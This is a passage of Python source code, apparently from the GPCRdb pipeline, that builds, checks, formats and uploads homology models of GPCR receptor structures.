Structure.objects.get(pdb_code__index=r.entry_name.upper()).state.name]) continue structs = Structure.objects.filter(protein_conformation__protein__parent=r, refined=False, annotated=True) if r.family.slug.startswith('001') or r.family.slug.startswith('002') or r.family.slug.startswith('003') or r.family.slug.startswith('006'): states_dic = {'Inactive':0, 'Intermediate':0, 'Active':0} if len(structs)==0: self.receptor_list.append([r, 'Inactive']) self.receptor_list.append([r, 'Intermediate']) self.receptor_list.append([r, 'Active']) else: for s in structs: try: del states_dic[s.state.name] except: pass for st in states_dic: self.receptor_list.append([r, st]) elif r.family.slug.startswith('004') or r.family.slug.startswith('005'): states_dic = {'Inactive':0} if len(structs)==0: self.receptor_list.append([r, 'Inactive']) else: for s in structs: try: del states_dic[s.state.name] except: pass for st in states_dic: self.receptor_list.append([r, st]) if self.debug and options['state']: self.receptor_list = [i for i in self.receptor_list if i[1] in options['state']] self.receptor_list_entry_names = [i[0].entry_name for i in self.receptor_list] # Test run, only 5 models if options['test_run']: self.receptor_list = self.receptor_list[:5] self.receptor_list_entry_names = self.receptor_list_entry_names[:5] print("receptors to do",len(self.receptor_list)) self.processors = options['proc'] self.prepare_input(options['proc'], self.receptor_list) missing_models = [] with open('./structure/homology_models/done_models.txt') as f: for i in f.readlines(): if i.split('\n')[0] not in self.receptor_list_entry_names: missing_models.append(i.split('\n')[0]) if len(missing_models)==0: print('All models were run') else: print('Missing models:') print(missing_models) print(input()) # new_args = shlex.split('/env/bin/python3 manage.py build_homology_models -r {} -p {} -s {}'.format(' '.join(missing_models, options['proc'], options['s']))) os.remove('./structure/homology_models/done_models.txt') os.chdir('./structure/') if options['z']==True: zipf = zipfile.ZipFile('../static/homology_models/GPCRdb_homology_models_{}.zip'.format(str(build_date)),'w',zipfile.ZIP_DEFLATED) for root, dirs, files in os.walk('homology_models'): for f in files: if 'post' not in f: zipf.write(os.path.join(root, f)) zipf.close() if not self.debug: shutil.rmtree('homology_models') shutil.rmtree('PIR') def main_func(self, positions, iteration, count, lock): processor_id = round(self.processors*positions[0]/len(self.receptor_list))+1 i = 0 while count.value<len(self.receptor_list): i += 1 with lock: receptor = self.receptor_list[count.value] logger.info('Generating model for \'{}\' ({})... ({} out of {}) (processor:{} count:{})'.format(receptor[0].entry_name, receptor[1],count.value, len(self.receptor_list),processor_id,i)) count.value +=1 # TODO maybe make check make sense -- since homology_models are deleted, then it doesnt make sense now # check # sm = StructureModel.objects.filter(protein__entry_name=receptor[0].entry_name, state__name=receptor[1]).first() # if sm: # print('receptor',receptor,'already done',sm) # main_structure = sm.main_structure.pdb_code.index # # class_name = 'Class'+class_tree[Protein.objects.get(entry_name=self.reference_entry_name).family.parent.slug[:3]] # # modelname = '{}_{}_{}_{}_GPCRdb'.format(self.class_name, self.reference_entry_name, self.state, # # self.main_structure) # continue # then check db mod_startTime = datetime.now() self.run_HomologyModeling(receptor[0].entry_name, receptor[1]) logger.info('Model finished for \'{}\' ({})... (processor:{} count:{}) (Time: {})'.format(receptor[0].entry_name, receptor[1],processor_id,i,datetime.now() - mod_startTime)) def run_HomologyModeling(self, receptor, state): try: seq_nums_overwrite_cutoff_dict = {'4PHU':2000, '4LDL':1000, '4LDO':1000, '4QKX':1000, '5JQH':1000, '5TZY':2000} ##### Ignore output from that can come from BioPDB! ##### if not self.debug: _stdout = sys.stdout sys.stdout = open(os.devnull, 'w') Homology_model = HomologyModeling(receptor, state, [state], iterations=self.modeller_iterations, complex_model=self.complex, signprot=self.signprot, debug=self.debug) alignment = Homology_model.run_alignment([state]) Homology_model.build_homology_model(alignment) formatted_model = Homology_model.format_final_model() if Homology_model.changes_on_db!=[]: cutoff = seq_nums_overwrite_cutoff_dict[Homology_model.main_structure.pdb_code.index] mod_resis = [x.sequence_number for x in Residue.objects.filter(protein_conformation=Homology_model.main_structure.protein_conformation)] for r in Homology_model.changes_on_db: if int(str(r)[1:]) in mod_resis: res = Residue.objects.get(protein_conformation=Homology_model.main_structure.protein_conformation, sequence_number=int(str(r)[1:])) res.sequence_number = r res.save() # Run clash and break test p = PDB.PDBParser() if Homology_model.revise_xtal==False: post_model = p.get_structure('model','./structure/homology_models/{}_{}_{}_{}_GPCRdb.pdb'.format( Homology_model.class_name,Homology_model.reference_entry_name,Homology_model.state, Homology_model.main_structure)) else: post_model = p.get_structure('model','./structure/homology_models/{}_{}_{}_refined_{}_GPCRdb.pdb'.format( Homology_model.class_name, Homology_model.reference_protein.parent.entry_name, Homology_model.main_structure, Homology_model.main_structure.state.name)) hse = HSExposureCB(post_model, radius=11, check_chain_breaks=True) # Check for residue shifts in model residue_shift = False db_res = '' for chain in post_model[0]: if self.complex and chain.id=='A': continue for res in chain: try: if Homology_model.revise_xtal==False: db_res = Residue.objects.get(protein_conformation__protein=Homology_model.reference_protein, sequence_number=int(res.get_id()[1])) else: db_res = Residue.objects.get(protein_conformation__protein=Homology_model.reference_protein.parent, sequence_number=int(res.get_id()[1])) if PDB.Polypeptide.three_to_one(res.get_resname())!=db_res.amino_acid: residue_shift = True break except: pass if residue_shift==True: if self.debug: print('Residue shift in model {} at {}'.format(Homology_model.reference_entry_name, db_res)) logger.warning('Residue shift in model {} at {}'.format(Homology_model.reference_entry_name, db_res)) raise ValueError('Error: Residue shift in model {} at {}'.format(Homology_model.reference_entry_name, db_res)) # Check for clashes in model if len(hse.clash_pairs)>0: if self.debug: print('Remaining clashes in {}:'.format(Homology_model.reference_entry_name)) for i in hse.clash_pairs: if self.debug: print(i) if i[0][1]==i[1][1]-1 or i[0][1]==i[1][1]: hse.clash_pairs.remove(i) logger.warning('Remaining clashes in {}\n{}'.format(Homology_model.reference_entry_name,hse.clash_pairs)) # Check for chain breaks in model if len(hse.chain_breaks)>0: if self.debug: print('Chain breaks in {}:'.format(Homology_model.reference_entry_name)) for j in hse.chain_breaks: print(j) logger.warning('Chain breaks in {}\n{}'.format(Homology_model.reference_entry_name,hse.chain_breaks)) ##### Resume output ##### if not self.debug: sys.stdout = _stdout sys.stdout.close() # Upload to db if self.update and not residue_shift: Homology_model.upload_to_db(formatted_model) # logger.info('{} ({}) homology model uploaded to db'.format(Homology_model.reference_entry_name,state)) if self.debug: print('{} homology model uploaded to db'.format(Homology_model.reference_entry_name)) with open('./structure/homology_models/done_models.txt','a') as f: f.write(receptor+'\n') except Exception as msg: try: exc_type, exc_obj, exc_tb = sys.exc_info() if self.debug: print('Error on line {}: Failed to build model {} (main structure: {})\n{}'.format(exc_tb.tb_lineno, receptor, Homology_model.main_structure,msg)) print(''.join(traceback.format_tb(exc_tb))) logger.error('Failed to build model {} {}\n {}'.format(receptor, state, msg)) t = tests.HomologyModelsTests() if 'Number of residues in the alignment and pdb files are different' in str(msg): t.pdb_alignment_mismatch(Homology_model.alignment, Homology_model.main_pdb_array, Homology_model.main_structure) elif 'No such residue:' in str(msg): if self.debug: t.pdb_pir_mismatch(Homology_model.main_pdb_array, Homology_model.model_sequence) with open('./structure/homology_models/done_models.txt','a') as f: f.write(receptor+'\n') except: try: Protein.objects.get(entry_name=receptor) except: logger.error('Invalid receptor name: {}'.format(receptor)) print('Invalid receptor name: {}'.format(receptor)) class HomologyModeling(object): ''' Class to build homology models for GPCRs. @param reference_entry_name: str, protein entry name \nco @param state: str, endogenous ligand state of reference \n @param query_states: list, list of endogenous ligand states to be applied for template search \n @param iterations: int, number of MODELLER iterations ''' segment_coding = {1:'TM1',2:'TM2',3:'TM3',4:'TM4',5:'TM5',6:'TM6',7:'TM7',8:'H8', 12:'ICL1', 23:'ECL1', 34:'ICL2', 45:'ECL2'} def __init__(self, reference_entry_name, state, query_states, iterations=1, complex_model=False, signprot=False, debug=False): self.debug = debug self.complex = complex_model self.signprot = signprot self.version = build_date self.reference_entry_name = reference_entry_name.lower() self.state = state self.query_states = query_states self.modeller_iterations = iterations self.statistics = CreateStatistics(self.reference_entry_name) self.reference_protein = Protein.objects.get(entry_name=self.reference_entry_name) self.reference_class = self.reference_protein.family.parent.parent.parent self.segments = [] self.similarity_table = OrderedDict() self.similarity_table_all = OrderedDict() self.similarity_table_other_states = OrderedDict() self.main_structure = None self.signprot_complex = None self.main_template_preferred_chain = '' self.loop_template_table = OrderedDict() self.loops = OrderedDict() self.changes_on_db = [] if len(self.reference_entry_name)==4: self.prot_conf = ProteinConformation.objects.get(protein=self.reference_protein.parent) self.uniprot_id = self.reference_protein.parent.accession self.revise_xtal = True else: self.prot_conf = ProteinConformation.objects.get(protein=self.reference_protein) self.uniprot_id = self.reference_protein.accession self.revise_xtal = False class_tree = {'001':'A', '002':'B1', '003':'B2', '004':'C', '005':'F', '006':'T'} self.class_name = 'Class'+class_tree[Protein.objects.get(entry_name=self.reference_entry_name).family.parent.slug[:3]] self.statistics.add_info('uniprot_id',self.uniprot_id) self.statistics.add_info('state',self.state) self.template_source = OrderedDict() self.helix_end_mods = None self.alignment = OrderedDict() self.main_pdb_array = OrderedDict() self.disulfide_pairs = [] for r in Residue.objects.filter(protein_conformation=self.prot_conf): if r.protein_segment.slug not in self.template_source: self.template_source[r.protein_segment.slug] = OrderedDict() try: self.template_source[r.protein_segment.slug][ggn(r.display_generic_number.label)] = [None,None] except: self.template_source[r.protein_segment.slug][str(r.sequence_number)] = [None,None] def __repr__(self): return "<Hommod: {}, {}>".format(self.reference_entry_name, self.state) def upload_to_db(self, formatted_model): ''' Upload to model to StructureModel and upload segment and rotamer info to StructureModelStatsSegment and StructureModelStatsRotamer. ''' s_state=ProteinState.objects.get(name=self.state) new_entry = False # Refined xtal if self.revise_xtal!=False: try: hommod = Structure.objects.get(pdb_code__index=self.reference_entry_name.upper()+'_refined', refined=True) hommod.pdb_data.pdb = formatted_model hommod.pdb_data.save() original = Structure.objects.get(pdb_code__index=self.reference_entry_name.upper()) # Delete previous data StructureRefinedStatsRotamer.objects.filter(structure=hommod).delete() StructureRefinedSeqSim.objects.filter(structure=hommod).delete() except: original = Structure.objects.get(pdb_code__index=self.reference_entry_name.upper()) wl = WebLink.objects.create(index=self.reference_entry_name.upper()+'_refined', web_resource=original.pdb_code.web_resource) pdb = PdbData.objects.create(pdb=formatted_model) hommod = Structure.objects.create(preferred_chain=original.preferred_chain, resolution=original.resolution, publication_date=original.publication_date, representative=original.representative, annotated=original.annotated, distance=original.distance, pdb_code=wl, pdb_data=pdb, protein_conformation=self.prot_conf, publication=original.publication, state=original.state, structure_type=original.structure_type, refined=True) for r in self.template_stats: # if r[0] in ['N-term', 'C-term']: # continue res = Residue.objects.get(protein_conformation__protein=self.reference_protein.parent, sequence_number=r[1]) rots = StructureRefinedStatsRotamer.objects.create(structure=hommod, residue=res, backbone_template=r[4], rotamer_template=r[5]) for struct, sim in self.similarity_table_all.items(): if struct in self.template_list: db_seqsim = StructureRefinedSeqSim.objects.create(structure=hommod, template=struct, similarity=sim) # Homology model else: try: hommod = StructureModel.objects.get(protein=self.reference_protein, state=s_state) hommod.main_template = self.main_structure hommod.pdb = formatted_model hommod.version = self.version hommod.save() # Delete previous data StructureModelStatsRotamer.objects.filter(homology_model=hommod).delete() StructureModelSeqSim.objects.filter(homology_model=hommod).delete() except Exception as msg: hommod = StructureModel.objects.create(protein=self.reference_protein, state=s_state, main_template=self.main_structure, pdb=formatted_model, version=self.version) for r in self.template_stats: # if r[0] in ['N-term', 'C-term']: # continue res = Residue.objects.get(protein_conformation__protein=self.reference_protein, sequence_number=r[1]) rots = StructureModelStatsRotamer.objects.create(homology_model=hommod, residue=res, backbone_template=r[4],rotamer_template=r[5]) for struct, sim in self.similarity_table_all.items(): if struct in self.template_list: db_seqsim = StructureModelSeqSim.objects.create(homology_model=hommod, template=struct, similarity=sim) def right_rotamer_select(self, rotamer): ''' Filter out compound rotamers. ''' if len(rotamer)>1: for i in rotamer: if i.pdbdata.pdb.startswith('COMPND')==False: rotamer = i break else: rotamer=rotamer[0] return rotamer def format_final_model(self): ''' Do final formatting on homology model pdb file. Adds REMARK line, correct residue numbering and class-specific generic numbers. Returns the pdb in string format. ''' # if self.prot_conf.protein!=self.main_structure.protein_conformation.protein.parent: # try: # del self.template_source['N-term'] # except: # pass # try: # del self.template_source['C-term'] # except: # pass pos_list = [] if self.complex: first_signprot_res = False for seg in self.template_source: for num in self.template_source[seg]: try: num = str(Residue.objects.get(protein_conformation=self.prot_conf, display_generic_number__label=dgn(num,self.prot_conf)).sequence_number) except: if self.complex: try: num = str(Residue.objects.get(protein_conformation=self.signprot_protconf, display_generic_number__label=num).sequence_number) if not first_signprot_res: first_signprot_res = num except: pass pos_list.append(num) i = 0 path = './structure/homology_models/' if self.revise_xtal==False: modelname = '{}_{}_{}_{}_GPCRdb'.format(self.class_name, self.reference_entry_name, self.state, self.main_structure) else: modelname = "{}_{}_{}_refined_{}_GPCRdb".format(self.class_name, self.reference_protein.parent.entry_name, self.main_structure, self.main_structure.state.name) with open (path+modelname+'.pdb', 'r+') as f: pdblines = f.readlines() out_list = [] prev_num = None first_hetatm = False water_count = 0 # first_signprot_res_found = False for line in pdblines: try: if prev_num==None: pdb_re = re.search('(ATOM[A-Z\s\d]{13}\S{3})([\sAB]+)(\d+)([A-Z\s\d.-]{49,53})',line) prev_num = int(pdb_re.group(3)) pdb_re = re.search('(ATOM[A-Z\s\d]{13}\S{3})([\sAB]+)(\d+)([A-Z\s\d.-]{49,53})',line) if int(pdb_re.group(3))>prev_num: i+=1 prev_num = int(pdb_re.group(3)) whitespace = len(pdb_re.group(2)) if len(pos_list[i])-len(pdb_re.group(3))==0: whitespace = whitespace*' ' elif len(pos_list[i])-len(pdb_re.group(3))==1: whitespace = (whitespace-1)*' ' elif len(pos_list[i])-len(pdb_re.group(3))==2: whitespace = (whitespace-2)*' ' elif len(pos_list[i])-len(pdb_re.group(3))==-1: whitespace = (whitespace+1)*' ' elif len(pos_list[i])-len(pdb_re.group(3))==-2: whitespace = (whitespace+2)*' ' else: whitespace = (whitespace-3)*' ' group1 = pdb_re.group(1) if self.complex: if i<pos_list.index(first_signprot_res): # if first_signprot_res_found==False: # out_list.append('TER\n') # first_signprot_res_found = True if len(whitespace)==2: whitespace = whitespace[0]+'R' else: whitespace = whitespace[0]+'R'+whitespace[2:] else: if len(whitespace)==2: whitespace = whitespace[0]+'A' else: whitespace = whitespace[0]+'A'+whitespace[2:] out_line = group1+whitespace+pos_list[i]+pdb_re.group(4) out_list.append(out_line) except: try: if line.startswith('TER'): pdb_re = re.search('(TER\s+\d+\s+\S{3})([\sAB]+)(\d+)',line) out_list.append(pdb_re.group(1)+len(pdb_re.group(2))*' '+pos_list[i]+"\n") atom_num+=1 else: raise Exception() except: try: pref_chain = str(self.main_structure.preferred_chain) if len(pref_chain)>1: pref_chain = pref_chain[0] pdb_re = re.search('(HETATM[0-9\sA-Z{apo}]{{11}})([A-Z0-9\s]{{3}})([\sAB]+)(\d+)([\s0-9.A-Z-]+)'.format(apo="'"),line) alternate_water = False whitespace3 = len(pdb_re.group(3))*' ' if first_hetatm==False: prev_hetnum = int(pdb_re.group(4)) first_hetatm = True atom_num = int(pdb_re.group(1)[7:11]) num = int(pos_list[i])+1 if 'HOH' in pdb_re.group(2): water_count+=1 if water_count in self.alternate_water_positions: if len(str(num))==3: whitespace1 = ' ' whitespace2 = 5*' ' else: whitespace1 = '' whitespace2 = 4*' ' bwater = 'HETATM {} O BHOH {}{}{}'.format(str(atom_num+1), whitespace1, num+1, whitespace2)+self.alternate_water_positions[water_count][31:] alternate_water = True if alternate_water==True: out_list.append(pdb_re.group(1)[:7]+str(atom_num)+pdb_re.group(1)[11:-1]+'A'+pdb_re.group(2)+whitespace3+str(int(pos_list[i])+1)+pdb_re.group(5)) out_list.append(bwater) atom_num+=2 else: out_list.append(pdb_re.group(1)[:7]+str(atom_num)+pdb_re.group(1)[11:]+pdb_re.group(2)+whitespace3+str(int(pos_list[i])+1)+pdb_re.group(5)) atom_num+=1 else: if int(pdb_re.group(4))!=prev_hetnum: if 'HOH' in pdb_re.group(2): water_count+=1 if water_count in self.alternate_water_positions: if len(str(num))==3: whitespace1 = ' ' whitespace2 = 5*' ' else: whitespace1 = '' whitespace2 = 4*' ' bwater = 'HETATM {} O BHOH {}{}{}'.format(str(atom_num+1), whitespace1, num+1, whitespace2)+self.alternate_water_positions[water_count][31:] alternate_water = True if alternate_water==True: out_list.append(pdb_re.group(1)[:7]+str(atom_num)+pdb_re.group(1)[11:-1]+'A'+pdb_re.group(2)+whitespace3+str(num+1)+pdb_re.group(5)) out_list.append(bwater) atom_num+=2 else: out_list.append(pdb_re.group(1)[:7]+str(atom_num)+pdb_re.group(1)[11:]+pdb_re.group(2)+whitespace3+str(num+1)+pdb_re.group(5)) atom_num+=1 prev_hetnum+=1 num+=1 else: out_list.append(pdb_re.group(1)+pdb_re.group(2)+whitespace3+str(num)+pdb_re.group(5)) atom_num+=1 except: out_list.append(line) with open (path+modelname+'.pdb', 'w') as f: f.write(''.join(out_list)) # pdb_struct = PDB.PDBParser(QUIET=True).get_structure('model', path+modelname+'.pdb')[0] with open (path+modelname+'.pdb', 'r') as f: pdb_struct = f.read() pdb_struct = StringIO(pdb_struct) assign_gn = as_gn.GenericNumbering(pdb_file=pdb_struct, sequence_parser=True) pdb_struct = assign_gn.assign_generic_numbers_with_sequence_parser() io = PDB.PDBIO() io.set_structure(pdb_struct) io.save(path+modelname+'.pdb') with open (path+modelname+'.pdb', 'r+') as f: content = f.read() first_line = 'REMARK 1 MODEL FOR {} CREATED WITH GPCRDB HOMOLOGY MODELING PIPELINE, VERSION {}\n'.format(self.reference_entry_name, build_date) second_line = 'REMARK 2 MAIN TEMPLATE: {}\n'.format(self.main_structure) f.seek(0,0) f.write(first_line+second_line+content) return first_line+second_line+content def update_template_source(self, keys, struct, segment, just_rot=False): ''' Update the template_source dictionary with structure info for backbone and rotamers. ''' for k in keys: if just_rot==True: try: self.template_source[segment][k][1] = struct except: pass else: try: self.template_source[segment][k][0] = struct except: pass def run_alignment(self, query_states, core_alignment=True, segments=['TM1','ICL1','TM2','ECL1','TM3','ICL2','TM4','TM5','TM6','TM7','H8'], order_by='similarity'): ''' Creates pairwise alignment between reference and target receptor(s). Returns Alignment object. @param core_alignment: boolean, False if only create core alignment (no loops) @param query_states: list, list of endogenous ligand states to be applied for template search @param segments: list, list of segments to use, e.g.: ['TM1','ICL1','TM2','ECL1'] \n @param order_by: str, order results by identity, similarity or simscore ''' alignment = AlignedReferenceTemplate() alignment.run_hommod_alignment(self.reference_protein, segments, query_states, order_by, complex_model=self.complex) main_pdb_array = OrderedDict() if core_alignment==True: if self.debug: print('Alignment: ',datetime.now() - startTime) self.changes_on_db = alignment.changes_on_db alignment.enhance_alignment(alignment.reference_protein, alignment.main_template_protein) if self.debug: print('Enhanced alignment: ',datetime.now() - startTime) self.segments = segments self.main_structure = alignment.main_template_structure if self.debug: print('Main structure: {}'.format(self.main_structure)) self.similarity_table = alignment.similarity_table self.similarity_table_all = self.run_alignment(["Inactive","Intermediate","Active"], core_alignment=False)[0].similarity_table for i,j in self.similarity_table_all.items(): if i not in self.similarity_table: self.similarity_table_other_states[i] = j self.main_template_preferred_chain = str(self.main_structure.preferred_chain)[0] self.statistics.add_info("main_template", self.main_structure) self.statistics.add_info("preferred_chain", self.main_template_preferred_chain) parse = GPCRDBParsingPDB() main_pdb_array = parse.pdb_array_creator(structure=self.main_structure) if self.main_structure.pdb_code.index=='4OR2': main_pdb_array['H8'] = OrderedDict() try: if len(alignment.reference_dict['H8'])==0: del alignment.reference_dict['H8'] del alignment.template_dict['H8'] del alignment.alignment_dict['H8'] del main_pdb_array['H8'] except: pass for seg_l, seg in main_pdb_array.items(): for gn, res in seg.items(): self.update_template_source([gn.replace('.','x')],self.main_structure,seg_l) helixends = HelixEndsModeling(self.similarity_table_all, self.template_source, self.main_structure) try: if (len(main_pdb_array['H8'])==0 and len(list(Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug='H8')))>0 or (self.reference_protein.family.slug.startswith('004') and self.main_structure.pdb_code.index!='4OO9') or (self.main_structure.pdb_code.index in ['5UNF','5UNG','5UNH','5O9H'] and self.revise_xtal==False)): if self.main_structure.pdb_code.index=='5O9H' and self.reference_entry_name in ['c5ar2_human','c3ar_human']: raise AssertionError helixends.correct_helix_ends(self.main_structure, main_pdb_array, alignment, self.template_source, separate_H8=True) main_pdb_array = helixends.main_pdb_array alignment = helixends.alignment self.template_source = helixends.template_source self.helix_end_mods = helixends.helix_end_mods if self.reference_protein.family.slug.startswith('004'): struct = Structure.objects.get(pdb_code__index='4OO9') alt_simtable = self.similarity_table_all alt_simtable[struct] = 0 gn_list = list(Residue.objects.filter(protein_conformation=struct.protein_conformation, protein_segment__slug='H8')) else: alt_simtable = self.similarity_table_all for struct in alt_simtable: if struct.pdb_code.index in ['5UNF','5UNG','5UNH','5O9H']: continue try: gn_list = list(Residue.objects.filter(protein_conformation=struct.protein_conformation, protein_segment__slug='H8')) if len(gn_list)>0: break except: pass for i in alignment.ordered_proteins: if i.protein.entry_name==struct.protein_conformation.protein.parent.entry_name: break H8_alignment = AlignedReferenceTemplate() H8_alignment.enhance_alignment(alignment.ordered_proteins[0],i) ######### temporary reference_dict, template_dict, alignment_dict = OrderedDict(),OrderedDict(),OrderedDict() for i,j,k in zip(H8_alignment.reference_dict['H8'],H8_alignment.template_dict['H8'],H8_alignment.alignment_dict['H8']): if i in self.template_source['H8']: reference_dict[i] = H8_alignment.reference_dict['H8'][i] template_dict[i] = H8_alignment.template_dict['H8'][i] alignment_dict[i] = H8_alignment.alignment_dict['H8'][i] ################### ######### change values alignment.reference_dict['H8'] = reference_dict alignment.template_dict['H8'] = template_dict alignment.alignment_dict['H8'] = alignment_dict ####################### gn_num_list = [ggn(i.display_generic_number.label) for i in gn_list if i.display_generic_number!=None] found_match = False c1 = -4 c2 = None while found_match==False: refs = list(main_pdb_array['TM7'].keys())[c1:c2] try: for gn in refs: Residue.objects.get(protein_conformation=struct.protein_conformation, display_generic_number__label=dgn(gn.replace('.','x'),struct.protein_conformation)) found_match=True except: c1-=1 if c2==None: c2 = -1 else: c2-=1 if c1<-10: break refs = [i.replace('.','x') for i in refs] H8_reference = parse.fetch_residues_from_array(main_pdb_array['TM7'], refs) H8_template = parse.fetch_residues_from_pdb(struct, refs+gn_num_list) superpose = sp.OneSidedSuperpose(H8_reference,H8_template,4,1) sup_residues = superpose.run() H8_array = OrderedDict() for i,j in alignment.template_dict['H8'].items(): if j not in ['-','x']: try: H8_array[i.replace('x','.')] = sup_residues[i.replace('x','.')] except: H8_array[i.replace('x','.')] = 'x' else: H8_array[i.replace('x','.')] = 'x' main_pdb_array['H8'] = H8_array for gn, res in main_pdb_array['H8'].items(): try: if gn.replace('.','x') in gn_num_list: self.update_template_source([gn.replace('.','x')],struct,'H8') except: pass helixends.correct_helix_ends(self.main_structure, main_pdb_array, alignment, self.template_source, separate_H8=False) self.helix_end_mods['added']['H8'] = helixends.helix_end_mods['added']['H8'] self.helix_end_mods['removed']['H8'] = helixends.helix_end_mods['removed']['H8'] self.template_source = helixends.template_source else: raise Exception() except: if len(list(Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug='H8')))==0: sep_H8 = True else: sep_H8 = None helixends.correct_helix_ends(self.main_structure, main_pdb_array, alignment, self.template_source, separate_H8=sep_H8) self.helix_end_mods = helixends.helix_end_mods self.template_source = helixends.template_source self.statistics.add_info('helix_end_mods',self.helix_end_mods) if self.debug: print('Corrected helix ends: ',datetime.now() - startTime) main_pdb_array = helixends.main_pdb_array alignment = helixends.alignment loops_in_ref = [i for i in list(self.template_source) if i[0] not in ['N','C','T','H']] for loop in loops_in_ref: loop_alignment = AlignedReferenceTemplate() loop_alignment.run_hommod_alignment(self.reference_protein, [loop], ['Inactive','Intermediate','Active'], order_by='similarity', provide_main_template_structure=self.main_structure, provide_similarity_table=self.similarity_table_all, main_pdb_array=main_pdb_array, provide_alignment=alignment, complex_model=self.complex) self.loop_template_table[loop] = loop_alignment.loop_table try: if loop in list(alignment.alignment_dict.keys()) and self.main_structure in loop_alignment.loop_table: temp_loop_table = OrderedDict([('aligned',100)]) try: for lab, val in loop_alignment.loop_table.items(): temp_loop_table[lab] = val self.loop_template_table[loop] = temp_loop_table except: pass except: pass self.statistics.add_info('similarity_table', self.similarity_table) self.statistics.add_info('loops',self.loop_template_table) if self.debug: print('Loop alignment: ',datetime.now() - startTime) return alignment, main_pdb_array def build_homology_model(self, ref_temp_alignment, switch_bulges=True, switch_constrictions=True, loops=True, switch_rotamers=True, N_and_C_termini=True): ''' Function to identify and switch non conserved residues in the alignment. Optionally, it can identify and switch bulge and constriction sites too. @param ref_temp_alignment: AlignedReferenceAndTemplate, alignment of reference and main template with alignment string. \n @param switch_bulges: boolean, identify and switch bulge sites. Default = True. @param switch_constrictions: boolean, identify and switch constriction sites. Default = True. @param loops: boolean, set it to True if you want loop modeling. Default = True. @param switch_rotamers: boolean, set it to True if you want alternative rotamer tempaltes. Default = True. @param N_and_C_termini: boolean, set it to True if you want to model N/C-termini. Only applies for refining crystals. Default = True. ''' a = ref_temp_alignment[0] main_pdb_array = ref_temp_alignment[1] ref_bulge_list, temp_bulge_list, ref_const_list, temp_const_list = [],[],[],[] parse = GPCRDBParsingPDB() # Delete H8 from dictionaries if it's not present in reference (e.g. gnrhr_human) if self.revise_xtal: del_H8_prot = self.reference_protein.parent else: del_H8_prot = self.reference_protein if len(Residue.objects.filter(protein_conformation__protein=del_H8_prot, protein_segment__slug='H8'))==0: del a.reference_dict['H8'] del a.template_dict['H8'] del a.alignment_dict['H8'] del main_pdb_array['H8'] trimmed_residues=[] # loops if loops==True: c3x25 = {'001':'3x25','002':'3x29','003':'3x29','004':'3x29','005':'3x25'} model_loops = [] loop_stat = OrderedDict() for label, structures in self.loop_template_table.items(): if label in ['ICL1','ECL1','ICL2']: x50_present = False l_gns = list(Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug=label)) for i in l_gns: try: if 'x50' in i.display_generic_number.label: structures = self.similarity_table_all x50_present = True break except: pass loop = Loops(self.reference_protein, label, structures, self.main_structure, self.helix_end_mods, list(self.template_source), self.revise_xtal) loop_template = loop.fetch_loop_residues(main_pdb_array) if (loop.loop_output_structure not in [self.main_structure,None] and label in ['ICL1','ECL1','ICL2'] and x50_present==True): al = AlignedReferenceTemplate() t = al.run_hommod_alignment(self.reference_protein, [label], ['Inactive','Intermediate','Active'], order_by='similarity', only_output_alignment=loop.loop_output_structure.protein_conformation.protein.parent) al.enhance_alignment(t[0],t[1]) a.reference_dict[label] = al.reference_dict[label] a.template_dict[label] = al.template_dict[label] a.alignment_dict[label] = al.alignment_dict[label] if label=='ECL2' and (loop.partialECL2_1==True or loop.partialECL2_2==True): al = AlignedReferenceTemplate() t = al.run_hommod_alignment(self.reference_protein, [label], ['Inactive','Intermediate','Active'], order_by='similarity', only_output_alignment=loop.loop_output_structure[1].protein_conformation.protein.parent) al.enhance_alignment(t[0],t[1],keep_all=True) a.reference_dict[label] = al.reference_dict[label] a.template_dict[label] = al.template_dict[label] a.alignment_dict[label] = al.alignment_dict[label] if type(loop.loop_output_structure)!=type([]): loop_insertion = loop.insert_loop_to_arrays(loop.loop_output_structure, main_pdb_array, loop_template, a.reference_dict, a.template_dict, a.alignment_dict) else: loop_insertion = loop.insert_ECL2_to_arrays(loop.loop_output_structure, main_pdb_array, loop_template, a.reference_dict, a.template_dict, a.alignment_dict, loop.partialECL2_1, loop.partialECL2_2) if loop.model_loop==True and loop.new_label!=None: model_loops.append(loop.new_label) main_pdb_array = loop_insertion.main_pdb_array a.reference_dict = loop_insertion.reference_dict a.template_dict = loop_insertion.template_dict a.alignment_dict = loop_insertion.alignment_dict # update template_source with backbone template of loop if loop.new_label!=None: change_i, change_template_list = [], [] loop_stat[loop.new_label] = loop.loop_output_structure ref_loop_ids = a.reference_dict[loop.new_label] c = 0 for i, v in ref_loop_ids.items(): if v!='x': if '?' not in i: change_i.append(c) c+=1 for i, v in enumerate(list(self.template_source[label])): if i in change_i: change_template_list.append(v) self.update_template_source(change_template_list,loop.loop_output_structure,label) else: loop_stat[label] = loop.loop_output_structure if label=='ECL2' and loop.loop_output_structure!=None: change_i1, change_i2, change_i3, change_templates1, change_templates2, change_templates3 = [],[],[],[],[],[] x50 = list(self.template_source[label].keys()).index('45x50') c = 0 for i, v in a.reference_dict[label].items(): if v!='x': if '?' not in i: if c<x50: change_i1.append(c) elif x50<=c<x50+3: change_i2.append(c) elif x50+2<c: change_i3.append(c) c+=1 for i, v in enumerate(list(self.template_source[label])): if i in change_i1: change_templates1.append(v) elif i in change_i2: change_templates2.append(v) elif i in change_i3: change_templates3.append(v) self.update_template_source(change_templates1,loop.loop_output_structure[0],label) self.update_template_source(change_templates2,loop.loop_output_structure[1],label) self.update_template_source(change_templates3,loop.loop_output_structure[2],label) add_ECL2_disulfide = True # if chain break in ECL2_2 is predicted, let MODELLER optimize conserved middle part, while keeping disulfide bridge if label=='ECL2' and loop.evade_chain_break: trimmed_residues+=['45.50','45.51','45.52'] add_ECL2_disulfide = True # add 3x25-45x50 disulfide bond if label=='ECL2' and add_ECL2_disulfide: if loop.loop_output_structure[1]!=self.main_structure: self.reference_class self.disulfide_pairs.append([c3x25[self.reference_class.slug[:3]],'45x50']) else: self.disulfide_pairs.append([0,0]) self.statistics.add_info('loops', loop_stat) self.loops = loop_stat if self.debug: print(loop_stat) print('Integrate loops: ',datetime.now() - startTime) # bulges and constrictions if switch_bulges==True or switch_constrictions==True: delete_r = set() delete_t = set() delete_a = set() ref_seg_keys = list(a.reference_dict.keys()) temp_seg_keys = list(a.template_dict.keys()) aligned_seg_keys = list(a.alignment_dict.keys()) for ref_seg, temp_seg, aligned_seg in zip(ref_seg_keys, temp_seg_keys, 